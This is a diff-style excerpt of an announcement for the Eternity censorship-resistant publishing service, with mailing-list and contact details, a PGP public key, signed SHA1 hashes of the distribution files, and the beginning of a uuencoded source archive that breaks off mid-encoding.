+Comments and collaboration requested
+======================================================================
+
+Your contribution matters.  Progress of the eternity service beyond this point 
+relies on a collaborative effort.
+
+You can collaborate by doing any of the following and reporting back to the 
+eternity mailing list how you got on (subscription instructions below):
+
+    - submitting documents to the eternity document store
+    - installing an public access eternity server in your account
+    - or persuading your ISP to install one
+    - or installing a private eternity server in your account
+    - finding and reporting bugs to the mailing list
+    - contributing code
+    - contributing ideas for more efficient distributed request protocols
+
+Adam Back
+
+
+More information
+======================================================================
+
+Eternity mailing list
+
+    send message "subscribe eternity" to majordomo@internexus.net
+
+The eternity mailing list is for eternity service users, eternity server
+operators, and eternity server developers to discuss issues to do with 
+eternity.  Issues include censorship attempts, operator liability, practical 
+attacks on the security, and discussion of new protocols, and discussion 
+amongst developers and users on the best way to design the next versions.
+
+
+Cypherpunks mailing list
+
+Cypherpunks write code.  Cypherpunks are the people who bought you type I and 
+type II remailers, remailer clients, plus many, many other crypto applications.
+Governments are scared of the implications of distributed systems and freedom 
+to use cryptographic code.  Cypherpunks are crypto-anarchists, and they shall 
+inherit the earth.  Information is power, and cypherpunks are applied 
+cryptographers with attitude.  They don't care if governments don't like their 
+code, in fact they probably view it as a compliment.  You'd be surprised at how
+many cryptographers, net journalists, cryptographic consultants, small ISP 
+owners, and Netizens are crypto-anarchists at heart.  Netizens never were very 
+keen on government intrusions into the 'Net.  Read Tim May's Cyphernomicon for 
+a mega-faq on cypherpunks, and crypto-anarchy.  See:
+
+    http://www.cc.oberlin.edu/~brchkind/cyphernomicon/
+
+To subscribe to cypherpunks:
+
+    send message "subscribe cypherpunks" to majordomo@cyberpass.net
+or  send message "subscribe cypherpunks" to majordomo@algebra.com
+or  send message "subscribe cypherpunks" to majordomo@ssz.com
+
+(Some time ago there was an attempt to impose moderation on the cypherpunks 
+list, and this is the reason for this rather curious situation of multiple 
+mailing lists, it is designed to be more resilient to censorship -- if someone 
+pulls the plug on one list -- the rest continue without glitch.)
+
+Cypherpunks is a high volume mailing list.  There is no moderator,
+
+Software
+
+    http://www.dcs.ex.ac.uk/~aba/eternity/
+
+Please set a server up a public access eternity serve in your account.  You 
+can also operate your own eternity server for your own use -- this is the more
+secure way to browse eternity.  If you have any kind of dial up or internet 
+connected Unix system you can do this.
+
+You'll need a web account with cgi capability, access to perl5, and read 
+access to an NNTP news server, or a local news spool.  Cron access is useful 
+but not essential.
+
+Current Public Access Eternity Servers
+
+    http://www.replay.com/aba/eternity/
+    http://moloko.insync.net/eternity/
+    http://eternity.internexus.net/
+    http://eternity.infinetways.net/
+
+Contacting the author
+
+    aba@dcs.ex.ac.uk
+or  A.Back@ex.ac.uk
+or  aba@replay.com
+
+PGP encrypted mail preferred, here's my key:
+
+Type Bits/KeyID    Date       User ID
+pub  2048/28B24551 1995/09/09 Adam Back <aba@dcs.ex.ac.uk> (High Security)
+           Key fingerprint = 01 8F 04 06 5C DD F3 33  D8 84 C4 63 85 BA 50 E8
+
+-----BEGIN PGP PUBLIC KEY BLOCK-----
+Version: 2.6.3i
+
+mQENAzBRMbMAAAEIANoe/ABNaJv6/ETtDzlih4P3znc63CMP4ViFWStxyeWWjxd2
+L8WOsM0b1naV4YmeRrd34GUsnZFetItToVqsvT5tKcwJKHwEWeXEQMbCM3cbaAxB
++MGSx9PoLRc4ZLz79q/hMQXybNKmw5Rk7NwsyLiejZR+jt2Eoy/BHeFMunxfXD8j
+38927FZBxG3UgCbL75ImJhWVsn8IoDOJ5psTfJwRcAZlkxsrpDSx2OIb6G35+pwm
+mEv8O066wOij7eMTQ8VQ5+rbn2ql0Ubsz3qA2szP2KZYlmobjwj5M82dmLcPfG9C
+bExMBldd8poJyBCn0e04kAFiGBJJPnvKqCiyRVEABRG0LEFkYW0gQmFjayA8YWJh
+QGRjcy5leC5hYy51az4gKEhpZ2ggU2VjdXJpdHkpiQCVAgUQMli+7B98EdWB2LS9
+AQFF0gQAjiAOPPCs7s0VCHoFI2IWMEcAeQInmnl2p+6rpsvIxjX1v3wBqqstgBu5
+aCLY9Uns+iKjzcnt5DTj6NPhJ8EOlefwgHUssiBLTsw7tOvT9fQwcIXOE5ikGP7j
+RObTq3a2Vtz4/O/YgN0KQnWcqTDuadeP17cJ2bbaWJpZiGDyWGSJAJUDBRAyIN+r
+RlGJMStI9vUBAXJTA/4wzbGnP9X0luqRYcfj51bamX9WdTDG9A8AvKngTbMG87x2
+jV6vUicIP9XMERSl6fgT35Q2BYSCKGlhH5gGYkC+IfkyMZFHvZMdATurb4MuRivW
+pv30gTVstoF61CN3JKF1N/j1Ez2LOfFWFW+miceowAPrKr3e3zHCRXyewv75BIkB
+FQMFEDBW0M+xVzBJFqEkZQEBBQEH/AnpNhKJh1IPmii7X7xxmccMKFnq5R2DAP4Z
++OJQ/otoy6AXifI9Y5aDYnm7sbPZX9uBk93ubf4Zm/v9wOcOKL6hXcE4+tvGSQA+
+rAPgph1+t96iDTSTGwf5ZKVp+LfJXBz63wZHDJ+JlSTDRl9YeSxeRZgAo2XJtI/h
+v7fazds4CK0jFwDSWUtQUd7my9znsJ92W0UONe6iltnFUvywUICNGyXxCHV4RDPv
+/wTmDKarzHm44OfdzXhI+oTQvY3lG51gU6TMjR6Q/bjy9YEYpTcDRvOpMmkJ4aud
+tCxG/w82OG6lKnFw8Hv46VcpQVPt2YZMbgjUJBIQi6FedDjeky6JAJUDBRAwUUqY
+Kci4nVVqSmcBAaFJA/wJ0vcYZm8V7gqlk+nDzjIDvGNP1IaQtBFaXE/imyQaqyKe
+oIsyzhCWCNnsCvu8Cq2ZwmD63wBKzs+63ZgzJ7h1hC4lYKUB1mCsF0UnrZNJ7rtW
+DVMa0aLlvxIia7qsmbhaZ6ibs5+juqn3CKUvjCJKyOpuS0Lmrem5EXk9Byu5/IkB
+FQMFEDBRSjc+e8qoKLJFUQEBWjEH/3yb3JYhsjoqZdEjA1xSZJcjyoTnPG0vUhaD
+oi6OhTByqYShLe14RU9rYDzpOGmdwpZ6GSwF4X0uBAH1lCGnsi6QQXrnsp1fBq/6
++TQy1nBs2FZyj/YTXQIKhhXIH700ed0Nqg4okwtovyUqX0xbqlA2Sv1N+XC6hKuc
+bl9XWOQbKi8OM8VEKeLnrY9Glzrxk9piVb+eCT1RJnLovWdfPL7WFOwSbOQ/I9aB
+jBKBHYMGdLihf7PYeb3Eg3B8Kt3IDfipPUFfXjqes94hpqQl/DGpWSpDHHFQ5cTB
+iQIB4twFzz4bI1HMVEayKboPliJl3dI9vY0SQJ58b6OFYJTB4Jc=
+=E4rO
+-----END PGP PUBLIC KEY BLOCK-----
+
+
+Here are SHA1 hashes of the eternity service distribution
+
+<++> hashes.asc
+-----BEGIN PGP SIGNED MESSAGE-----
+
+eb32d19e992e4663df29141cedf6ec0aa3f92af3 pgp/config.txt
+7b1da1bd199b2dded10216a3d19e4b05bbb66c90 eternity.conf
+a44cec86d7d0f1cf1239f1c00bb21dc3476148b4 sha1.pl.dist
+1f9f7860c8c2d5b376c8bffa7417ffe54b8b1429 newsgroups
+926a9630fd214b756ecc18658d813017b288bf2c sha1/sha1.c
+58989aa6f40b06136d078a96ad958b482756fe8f sha1/endian.c
+2d46e74b805ee06d3960ff756a09407f0b3267fa sha1/sha1.h
+21e7e596a715c6ed247f9444393df675d7447f23 sha1/endian.h
+5f9c194f542960c8e7f9f6d81f84cd3b62dd4032 sha1/sha1file.c
+4544f194e381a3b64150f3761900993d28c5f465 sha1/sha1test.c
+ea58eec253cdb4af6d3958d94cebfbe39988da44 sha1/timer.c
+22a60ac9aa0242ad6ee00da8781500c5c1311837 sha1/timer.h
+67d37d81d0064c2a0a1a369cba2cfc2f9d878803 sha1/types.h
+f7691ef67ac7a111082c6730b045ea2dc00dd903 sha1/compiling
+01a7b85827ff35583bd11cecb7470c4917fdd0ea sha1/README
+efc53ecc93eb1105341f4e250ecf654a44a11394 sha1/Makefile
+5375b154bd0724dc0c6ee6fac59bbc5c93a6a209 adam-key.asc
+0b9849c2332e5d7aa7714adc67861465d99b34db mime.types
+b50a661ba69747c8969ebfb9c997eaf0f1b75893 README
+d498a12d0a795d3ae22bc059631293b0a0ab4cd1 ANNOUNCE
+ba8ccee1f86dc5872b5ce95c0e2e494924b927f8 configure
+6f9bcf72be9f836f5201bc430cc764828fda68ba news/alt/anonymous/messages/1
+ac26faf5df1e14eaefa6e0e05f5be2d2f1ee67db news/alt/anonymous/messages/2
+75ead2fb83bf3fa2c701b70741097f4956fb9043 news/alt/anonymous/messages/3
+4c892147c69fcfb60803587c5606427d1641d473 ecat
+fa3b13f3e8241936795d97f72fe647f0a4a26902 CHANGELOG
+31cc2c663972f536922f3603625804a42b40c367 UTILS
+08120e964cb8b61f2c95ac155a3f75ce8b27535b dcrypt
+0fded38fd70c8626551e7bb21657cd960c2b8f67 sitegrab.dist
+7121ab8cd3e54bc962524054c95316b28d8c76e4 dev/submit
+56a1cb622bf8df7f863e8449a97ef8746a0d2469 dev/submit.html
+f1b6720b0861b1d79fbedcfa4cc694b1172c81a1 SITEGRAB
+428d389aa228d9e96c678d4400179df1ab5db0a3 fred.asc
+3ed6458862762fa993a900ec1b5dc8e2c739f61c eternity.gif
+5ea784f32dc51d74ae98134adcd93126230d5a0f rsa.gif
+2c62082f57ca8c0019f741d04f5f14133976bb15 cypherpunks.gif
+3d7f09b91b04577dc4406eb9493753dc1e3ba7d2 datahaven.gif
+8016173f3db9fccd0b787c9682e7b7bec1ada3b8 index.html.dist
+108e0ef9d29387e3cf57b68614a4e8b2961c2d02 disclaimer.html
+7ca4684965a7b4d51ad032f85c20480f0cd175fe eternity.cgi.dist
+08b072350488abc3ac6337ce95d7cf881e1f547b directory.html.dist
+769d9620c85de07a3ce6703a39b56eafdd3cad9d host.html
+24f17a65a4a637d60c5cbaab485eda231adb62c6 dbmcat.dist
+584d76031069f89fef3288cdbb6bed6e89ec7fd6 ecrypt.dist
+122584c63267811628cc790ef898e9d651cdc728 LIST
+
+-----BEGIN PGP SIGNATURE-----
+Version: 2.6.3i
+Charset: noconv
+
+iQEVAwUBM/L+RT57yqgoskVRAQHpdAgAjbGfqr4FaycrS/LOHq4TnAQIBoTYx+6k
+cG9DTnUMp/gQSXqwBzvSv1bmou/+nwvH/qC5UgXc7Ko98rT8+tAatfrZj3u1g36M
+a63oWtonLFJowOO8w1jBiPSpl44kT25hPYZ2qUscVC1qGzbSmutHhDyToY4y4i7L
+v2TARR4Jq3dJI67WT63dxr1/o+AnTtNZBTq5c9z5LzfQWVfP9HRaOgYXF6d4LrVZ
+7NF3YKImEe5914L45CUW+OjJcsabGufFVj4waR0kNhdmA7ZQT3cxkg5Ygv6jhtcn
+q7Ys67hMAYU0TGrxvyogEy23FyzXC5wi1JY2NBYnE+AuJXObDGB85w==
+=Xfz4
+-----END PGP SIGNATURE-----
+<-->
+
+<++> es.tgz.uue
+begin 600 eternity-0.10.tgz
+M'XL("/^L^3,``V5T97)N:71Y+3`N,3`N=&%R`.P\^W?:1K/]U?P56Z+&8`-&
+MXN$'QO&[\<WSQ&G=>YJ$;Y$64"TD73UL\R7NWWYG9E="`FRW/=2]]WQ6C@-:
+MS<S.>V97:XM(!*X=3:KUFE[?^.YON5BSOEFOL^\88VVC39]ZLTF?ZJK#D\9F
+ML]5NM38WX2D\;GS'6G\/._DK#B,>,/;=]?7U`W`B"!^#H<>]1,[^_M#_&WS@
+MS]A_LX7V-XR&_F3_Q[CF[6]Z[L`>UJ*;:%ESZ/5Z^S[[Z_46V;]1;[6:FP8^
+M-39;W['ZLABX[_H/MS\/QE[@V*X(69?5"U<BZ'NAH.^F-_8=\(^PYPIA"8L&
+MQSP8VBYW<H/_M!!/UU^^\O%O<G,DEEX!_G#^;T*:V&Q@_F^V-Y_R_V-<>?LG
+M=S4L`DN;X_[\KQMZNZGLW]I,\[_QE/\?XWJVE*L`_UCB/$QV$''`(]MSV<!V
+M!#T/A6"C*/)W-C9`V37+#&OBIL;-6GRY\3OO\]3[-@"\L"S&IFQ9=B#,R`LF
+MA4(RUH,QJ&#%C9$W%AN#0%@;?MQW;+,WBL;.E*'B$OF)1@(*+`^$NQJQ0'#'
+MF3"?1Z.PPOIQQ'[Z\#ID`R]`N"GOR!\*`/BE:&2'+!QYL6.QOB`X0$IQ4C%9
+M3DK>]ZY$.2-Z'#@D^N\D=DY4QETK1W>:%X;V3H8&W!(-^*SV;7<C"P>$EFC$
+M&Z3,'>8'WC#@X[!0\$7@M'KB1A`'<1AL.)[)G0WD`Y\55YXQ@F$E_&BR:P\U
+M;GGE`K2Y=R$._>(*(@Y]9M1N"N&(ZW>`XB.<XXB%7AR8T$#9KNG$V!-)4]C`
+MI#!'7H*/WXDX/@XG823&(;NVHQ'K!]ZE<!D"A(65%8010P([]QP>@+DA^S":
+M/S;[&PBGP-!(H)*^(\8,P!2A*D1=[)H8?MP!<RS3$&-N.XQ;5B!"Z:>!\+T@
+MLMWA3-R+(/`"4`&WQK;;<_F8E/#6ZWO6I$C,3T!OC!Z4/%\RZTS*;.B!+D<B
+M$`I53@FX+N'N6^*JYL:.4TQIY)F:XJ]()5ED>%3A+@.&]RKX/R"N.DX"$IJ!
+MN&:Q3PI%:I&WLT2M72,[."4X(8:M8U]"X'IL*"*E!7$-V@R\<8T!.%P%$HV9
+MW&5@26\\%F[$/%<P;R`S"`F!,B''T*1'+/0]SX&,X'C7E&_A0K(].8X.?,6#
+M#;K;P`=%-G,](WJ<D8\3+L(J2F[D]Z`$P@*!3`$/:P//@T9A/$<GI>02&I-H
+MQ!,L'#SF>A&S<6V!0D&X3$0D<Q\00S\*/<_=243@3L2O;"C2F=FQ?*3C-<L>
+MVA%WB!6)8XG?N!0]AY(,*TB`M0>@4\B_8WX)/A,*-R2SA$+J>BRBD6<Q'DFW
+M\)!?3(]6/!Y/I,VD<BF*0\S19`D.\6`Z0+%DN[DL7$:[FB/N#FF>C';0FE.]
+M*[*>:Y+7K%X)\&I06@3^$UR"C@J%O&D7VG/&)#G6EIF<:=7`?`_JYN0%`ZY1
+M&&\PP`_AFL'$CP`J!>SB,S(49*X=\`8(4&N(1@!-V>`A2(&BPK+#2P*$S++#
+M1O9PA(H";8T$MU"!`Q&9(XJ;G"ZQ?%E"39R=UYU."U&2(3:=Q7>X#5YY$SW`
+M58;L5$9%&PD$8V'9@)M.49&NIH#![2TO2W[*P90G&#NB.=`A05R%"W[)W1!\
+MDD<J22",Y9DQ.JCJ(^@IN"VZ:_($NXX,`^2UG%V*B<HJ#&M:\AW[`S\0`_LF
+M`052>HVQC_#0M@3'@D.S0!0A&S+-7KK>=8)?27(8UEUI#_#A&M`YDRA1'+BL
+MF'8L%*^VJ5RD*-%[5+=[DO"UD@IY@0E(HAHI"I**V&$\AH@-=EB1]+:#9#8\
+MZ$NDS$6&.QVD8!`@E#4:&].(ZA>T":FN*M!RF`+XE:F;>BZ9NZ%;BDV9=J6[
+MK4H:9AQ@YR/UDY!1#%$>Y^$E%<RQ!P1]'G#7L[DTUK7M."@2M'/VT(7G%BH5
+MZ`".K+(.5C;0-OD@\/`_L8V2%S*NO;R`AKF)+BHEXU8C,$#?'B:])VI`3@]L
+MERPQX+$#/@9^^JI?`2IO^A2(K_K`KND-7?O?PBK#XH[]V%>J!#P7S;U3+2M)
+M>B%`@3@MP%YJ_;4A3TP[XUD)K$R,##V(7]`WMZ@6.3P<,7(3W@\])XZ@\D+*
+MFGT.,CK0]UQ17L^U[8ED:JE!-\M<3QQ[LK'@+N6(,:8O^,$Z#N41HYF6%#""
+MXH(OC7$,',EV+7%#R[,7F;0H0`6^\*`ZTX*-`H[R&50/Y0\RC_`K:)-X'Q=W
+M2>;BH$VHQ-X0&9E-GV-(WQC^H7`&K#^1SV<"-UP-6?$=]8([$("IP8J8='$N
+M&;-,MHNY@"T4%J:198;%6RBRP\"+_9"TAC*CIE$KB:K=*0CU$3S`^I1905&J
+MD-PAC;!&'4X-<H$[&7MQ6!M#H/,AKB9`S6P<AY"*H+-E'E@O@*$0K8TN;8<C
+MV07(^7K$DFH%Y-`RO>QH),Q+U:9ZU*].NQP+,A^V_[`(],`DU/Z_H*1\B"T'
+M*$+VE68`-OO-Z^-($$/B3^.D&A=E(E2EA$I&I@6V/*Q3L+@:"A7+L6^!9T&'
+M12T`?$&.D+VRXD85"5RA0G-O^Q&X5F2/!25HU*V-50D*7`3S]X7)DUX:-WI0
+M^=?<1H?':O42>@7L*ZC\GYV_!Z^>4!<[Q(!')KEI4H+V2$A9D4XQ[Z/(2!DK
+M>%$RG58W@*8"Z,G05(MH)9JL2UD<%^P),+W,R!(-##("6Q&L'E$(LO:<H<$Z
+MUV(58I^>HY:SCZDQ3CT!)9'M6>H3K%2<X1^48`O29!P2(JBKC'L<L`Z`@@-%
+ME<I.#(X?0[8*PLCSH)'"J,#B(7LXD^-J2-4?PBEG%=6C['7%'2HK2'B)6H.6
+M_3)35W`?IY(X,7;L:FT>$B!*B+T'>WMZKEHC+$/3)8%-P9(LP$[/:14+#ELZ
+M0^\E[U/A`\M5U*':[RE#(X`3)#4&OR\U^C&E4W[!U7H%:PDJ/5=W_)C6)[@(
+MDBV3<$(!JP'D;)@F)_A>?'I=]'_HRN__8_]?\QU84H=+>_M+^__WO?_1=;T]
+M\_ZWT6[7G_;_'^-Z]OT^;9+NLZI]O/VQ>?2OO5[UOWXYW7K[YOR+]JS<[+[>
+M,'YY\?W._H^GVYTW/[YZN?6I\ZYZOK;U>K5=V#_HQJ[/S<OBV[5B17YE<47[
+M<M;9?]4-?0?ZG/V#2JO2[(1QG[WY6M)NNK[GEZLE;=S5UW^OE]<@/6LW&]KX
+MME-`F-=?-1=!.@GH[J[F?C/6UC2WJC_7;O;V&D95<V_W3[LE@/^J]9^7-/.+
+M9I7AY[:BG7?EZ!?-+-`(WI:T_C?-+#_7K&\`KYD(5^Y8WE?-6>]J03?`_83S
+MC\=G;RM:K])N=K1@?1V^UKK%3S=;]:(]T(+=0KOY_/GWFK^^WMF_4'*SMWH;
+MX8J?ZL6;S8YV\:O>^MS5G+4M1CBMS0Y4T9+>KM4VM\M?_3@<[5]47@.<UBM4
+M&Y^_T+?J5O)%;Z;?VI\K^FU)XQ6M7]',BF95-%'N[A\0P;JDIT7=-\^_:J>`
+ML%$PZI]OUS6Q3OB?U[57.`J#ZZ^!2*NCB:YF=32KJYD=S>R^!K*->D?K=S7>
+MT7A7BVZUJ^XJ7^V`4<?<_UIXH_76M:_:U?KZ[>W^P2WT78[0@KU6N^-#E8\&
+MJS_4MF[8ZDV+@?A0RO</GC+[_[LKG_^I<?A'W__K1A-?";<:S:?W_X]QY>T_
+M73LN<XZ'SG\Q8W.N_AN-I_K_&-?BS8>G1/Z?<N7C_U),EI_^_\KYK\;FT_FO
+M1[GFUW__H/T;\)].]C?:3^?_'^5:8'_:!#"7.,<#Y_]:[8:>UO]-`^W?:-;;
+M3_7_,:Z-M0);8V?):0RY3^L-V*FP1,`==N;B&R,Y_#[P<)<;MS'/(^Y:/+!"
+M]I[.RQ$`4CH]>W_.]*UZ56<E?9,=^`'3M[=;9;5M'\8^J%'@R]<$$N!T]H9/
+M$*Y1!AI(YMP7PF(C7&%?`0(QY4?VV`[5\:J0`$KXBHK.E`1B(`*!YR44/%+"
+MG?>0C;D9>"$+Y7LR/+9.+R`$GF^')6V%]I]_PRWE0#BV>ZE8.+#XF!TB![N\
+MS_>SQQ7W),A&H;"QAAO/^%+YYY,/A^_.3Y)3/5X<X8XHIQ=O`]LGE>`O52#:
+M,WN@T*Q2B@@,XS$-=8B,[8:197NUT5[AF7`M>U!(GQ0I0$?%S`A"<!?'"L\4
+M/V/;+;&;"INP,BO!OQOXW(5/O'^A[G?4?1D%672EQ\A0DU+QL#IPP>SU6DW?
+M9AE0J8QD]E.]Q`XK[*C"CM7\I<,R>\Y*1S`;^P;WOZN!8QPH)\K$]]I7W*$7
+M\'@"AUY[IR\0=DAY=TT!E+Y,)Z*IOJ3T0<0_+:,!0C9FA4RG-V:F/Z3III/^
+M^?F:,%_K/J4VYJ?,JA2_)1J=O?]#^F4Y`6=GRVGVFZ0[/]%?D+M-NUEWZ;GY
+MH)X3T%<ZJ]^T#K:,S>WM;<9`7--S(;V[T5WN._6F5P;@MD^.MT\.#_3[<1.W
+MR"`W`'GK5#\\/#H^NA\YL7$&N0G(1P=MXT@_;M^/G"A*VG+,A[:9`H<YX[VL
+MHSB;S9;1J.O34530R>G1\<'AUO9T%$7?WCH\.#XZ/9F.HDQZO6'`DKP]'25F
+M&\?&B7Y:+Q2NO<!J&.S\Y8'>._OY5]9BGUF7?87I*S`9_!CPTZ@@VFV'F`Z\
+M"%]<_<)<UK>!:4<,(DA[)1C9W=V%T7).CO.26V&_*/>#3P`IN:E_P\#>'GP!
+M%JIJ7#F@/":`)P7PS!7I4;V52\])>)!4)_0&[>QGG!.0Y-D;B9MZ*^K?CP/?
+MPUJ2G)-2Y8]XO?)L2ZK`ADZJAT>E0!DE.61&-V#0"!(Q'C4E8['^))*OF4EG
+M!'9\]N/)^<?>X7]_/#D''98+7ZD:*/W.@EV\^W`,8*!1!*(G_Q:!UP.-FN`I
+M40EG9.4./1Z+L>E/2D"DDDQ:63!I`LTO!=`9]F1):1@2<7YV!4\/0A&1Q"0G
+M:!.>W6;U$@7<#;&/**4BO5PH$6E)MH495;U1L&=OW_\TKR,;[=G)JNL`?!#H
+MUU%#F>%#.:S/#!_)86-F^%@.-V:&3^1P<V;X`NBV4XLD*K^HL#>5>=[+,A1^
+M"M,3IH?R#".V1%5JB;"O@:X!;[!I**?'T,AQP`UQGDB,?2_@P83Q((`&Z@+=
+M$[`E3_($"1H!G+\_24Z.,CH:9-J!&3L\0#+]>##`HY`#1H>O0`Y%H(9O;V6R
+M69C058S2N5?59"T$E.GJP@35J7,2%]@8J8E27A)&LO%_89981'D?-%R*L,SH
+M+3(^DCSB#F*"BTS/7UPH9:A#%0,(?SI_XT:!+6C26HVI))K.,I"S?"+KE=)9
+MNY!_&*2QY/Z+^E:%]4ON=BMWU\CDH<4L7ME!%$-W+5DU%0Q:)PN5$2'/K3-)
+MM((JV46A7B0*^@Q='<J#WV5U7-QL)M0^G+Q_]^%C5OZ!?+U3@BP':X"@PHH1
+M:.('P]IA/]2W;@#BS@]\#?2I(",8.HR#2E*Z*Q`XX/;/\%#`HJF3)G?Z[-U/
+M;X]+<T0J[!3R<H6]2KD]8>MDIA9`PN`Z`61;AO6,PM;9JXY$.Y3&;4"A.@3.
+M<KR@W3Z(L7<E9+F2O=')*J`<=]@Q?AYUV!%^'G;8(7X>=-@!?IYT(-0*E+[D
+M+\]B]7$#SW'(N*XE*28'E'@P5*<.\2S02(61%+Y`V=B-Z1>$0OE8(@,S$-IJ
+M^0*%S:T5LOY!V"W2W:RR$JV"(NIW:[8S!ZP30!;^'F`C(9C"WP/<R#`@X>\!
+M;N89/L@`SXAOU//R9TBU)"U4P,*IDN>M^Y_K#^#KK1QW=Z30Y-#9`^GSG@4C
+M)C><L<OJ'?C`9`"?Z^OJ\=?"RGP\7_P*T8R=6A*SJ"O('Q%F5EG7;A>G@D+N
+MEPP.,M\/,]^/,M^/,]]//KDPFTP$,MQE2TC-[;0GG^H2S4B&`@>$[K[<R2(8
+M>M*'YQ$,1``GA)8^CS#MO?,(340`1X0V/H^0Z;=S"&U$`&>$UEVIB_Z3/0?F
+MHX-.,J#+@<-TP)`#1^E`0PX<IP--.7`RTT3)TVQS;:7LDQ!LC2$$KR0]"=[T
+M8*F7=DK3EFJ-'H(#$$:NDP&/S-T[WC7VE6$G;;;&0%.J"0A>B2":S@19C+IZ
+M3'1X:%5EM7:S"L/XB%%_RN9\&B=K-Y7/X@3`&_63U3TB"&T^5M4?YIHIR=84
+M<!WQ2I)<.:,"7#DTD@(T/XGSAV<9)=.DM`'+V.[@PBVTQ[+6@R@H+*C`3M;5
+M2"#1)<M@2[Y2\DY"?D;O@SRGNU-:95AO33E;7^]`[";A1=M37/U^TL`.T/QT
+M9#%QZ9C^U@/M%<VUJ572426CQ/R"@B9]`ZEN"D8KC!0.<4"2U*-20M69P11*
+M.AX>-`%QI86Z"_KG)+,M6*R4I-NNE25WN>X[7;BLS*Y*"/AE)1$)0>[13%XE
+M*WE]S"AB1?D9B;>R4`-S6I#Y-Q?\`_R;&S.QGUL!R:!,[GST/'?8N2?(U`VN
+M(:;I>%DQ^9?#+&$DC0=8^Q$)K%;UFRVH<7B+7@Z^S7U?8*:!+(OAIJ),"<\6
+M>$XU25Y)LW!X]K%W!&D]<0YCP1.)6IJ#7:/UDC<H):F2VNTT6A,V]KISM*8.
+M+,:P=IX+I?I-'2I,0J`ZC]]9Z/MWNGQUCO=<E4^-]1!'=^CS3_/S!T,PS\L]
+M3"S0SU2Z>YR:[.384>0(Q?;4-!@8,PZ/J=I@WV9"P+A;F8I&"I^%F\NB#\M5
+M8<^1(FZ2((4%4F?B[B^1+TT+2?G>:2A*\>G#9H0\EFT\"&$HHIYE#T6(UJ6'
+MBS-;B,L=4^X"2?B%^V69'NP^DR8ZD90J*:\+-\,6.72"N'`W;"40]-L<$N@N
+MEU!`I8Q*RHF3O9QZTNUCG<!9\/Y7O4Q:WAO@!\Y_Z>VV/GO^:Q/__L_3^]^_
+M_UKT#G$Z%DU\$=)K16I%PFONJW#0VR6UZ)#M#G8=V;4&YEF]S:*Q#^M1&I'A
+M3P,]'O;P%AOADHJ!YQE0B2Q)(ZR\)VCU2+;V6<()+-&==D)V)C?(I;(ME\HV
+M]M#0"S`[NU8F)I+V?#KSKP#^.>G?%C%?6HA!:6$&2ZX1NS.*4-O2LZ#Z0M!T
+M8WO:)&8L@XGJ(<M`T0*B#6/&,@WC+LLDH*J[SDF+6\W=:>/]]UD&N.[.SOPG
+M+9-@/&"9C"+4*X`[+9,#-1:!&@M!%]J[L1`T9^\EQ_]=YW]&2YSC@?S?J->-
+MV?S?:.M/^?\Q+FR.OT^[XQ[]O:-1YO6`&BDL*@J+SY]DN^U>S_2=.,0?H"G_
+MB!,K'A4AH&<W_.?ZTW9S!99X+=V06TJ9-^9SZXD%FQ>X*9,18[YC:R%UO5U?
+M3#W7#986H*\Q7$044!>`!XUJ$)L1RV78Q:\X_\":G)8**\C?M9#OJWFRHT0O
+MS)#9M*=4DU'/_K_L'6ESVDKR<_0KM*[W$CL0(R3.^%T"!`9SG[9?ME)""!`(
+M22")P[OY[SL],SJXG&0KY>Q664]Y%J.YNJ?5T]/3W1-E=5(6]K+!5Y?&Y)C*
+M:Q6;>Z`47T=%%LPA4?[\7BL2XGT!_>9@R([V?NE6@R=LPY+B"HO99_:=SVD=
+M]EHYM;U-=^M(_52MQA',?/K.TKI7_&8O>1JJE5`K)>$3=@^'>`%;`-H4Q<CY
+M??IPACU\T@8`2<\H@O>4P+[Z%\UP!_HC-JQ`HIIN1=9ULC],MIX027S7:LU3
+MF*LV.%]KV-QMI6*#"T0!YFH'G;-V0&T'!AAS5;4\(@PCSF\IA+K#)=V?)SKF
+M4(NV_945I3[?*@1B[UDK<ZTAMH4&<R6'=ERQH[B!0_V,<0-8+JD5\EB?71/S
+M]K?9>T1#FO8S]ATWIZTCR-!]Q33BJ/(#NXB;9YEPH!RF?W_V#/1Z_<SK_/K_
+MQTF`7Y'_^`27.%K_IU_]OU_D.I#_R-CO2X!>VO?+=HCCXE@KX=A0,@[]`I%8
+M6,K,(2[=-<L^>+%>//U[Z;-4+Y3%.LP`B`]7R]UN5:)IH/I?F=8*(JSI.QQK
+M!QN$.U/-F-BL:UUC3?Q^&1RO3/6"9")YZ".;X;:9%)*;^N*]S6!E9RG(_9%=
+MF(C3NH:VA=EQ"E'2HVR[W,FSZ(>%GE,9#E32JJ/@YB#R%P$*9A2(TNJ06%X&
+MW>#_R/@[/OLS&B3#),.R@<;1JQ+-6$/3U%6$F[6LNVAY"V@:TB@LI'H<&T0Q
+MT:2&?N31S&9!*$P-S1377C5^U*MZHXOCQB*T>Y'=T)1"=BJ1D$#D`-"\JL0T
+MY1(-.QH4J`8!>G6-M[9"B()^[R/:BW^*0Z$XT#0$C**40SJ41REC5R>Q<4B_
+M5,-VJ8T;M6U9>0\VV-,3^+`A'-1@F0A`"#]UM)D<ZAN6JSU*WI<AL*@8+K8/
+MPS,EXX'X?3H#DGK?LY>Z:4R0"'+Q*?Z)@_\NP*+L=[3P/[9V"@8=E?W'D?[Z
+MO/:-J'<\<>*4%LC/$7@&G%!L8TT1V2@_)W$=5!XN\I'EPA8X!PU`9[^S@<,B
+M!PWD>NTZ=FZ`=]XN$?KY[A/W#B>^2D#?>IW1_T"\GA^V`_`U_4^</S[_@W^-
+M__XBURE_HR-'H]"'5RQ*[<^=\J/$QCD^P3#`7.@*4T=K4F4JK][C4%$D4A36
+M*2Q&SUNY%\M5B10*U,;4&/COO2;_&6B/L6KT,\1M"=),2S7(B20AVW18%V*U
+MA:]LQEN$MK-2%M9EJ*L7'RB#YD*F<R1L%:#&.+>C1_.,H?6]^E9#;.KV!K='
+M<I'*W_R+[*S2O<`/<93I"_/&[W[<:RJ`@F@3WH;,^CTKF7^,L0D"KO\JZ'F`
+M'^@;_+VD*(V"-6<(JU%:UNMIJ.1O>]A_^Y8=XZ#>H=;.@+*GIWB+51E>XZ'J
+M]_;-PV8N83@]/=)B%-W7#Y!,S[@R8&@H4H,157335B]]F(,.4!"XT(XUH>:I
+MNO4;_29Z#NUNT`ULJ`CJ.57N/<N#N:CO/'"T%W)4Y&!GQ/:,-%$#8'Z+:M00
+M^?W*\=N+*.ZL=FC7B;OB6:]`L2NP:<>;#S"'WH01@EYCE&`K(QGLH>!)7DV4
+M*$40>E[_?1+\;]NXAP*`*-<^_$JA%4]F\J#%&3WC'L)UT*<;I<T$=$PS_K;W
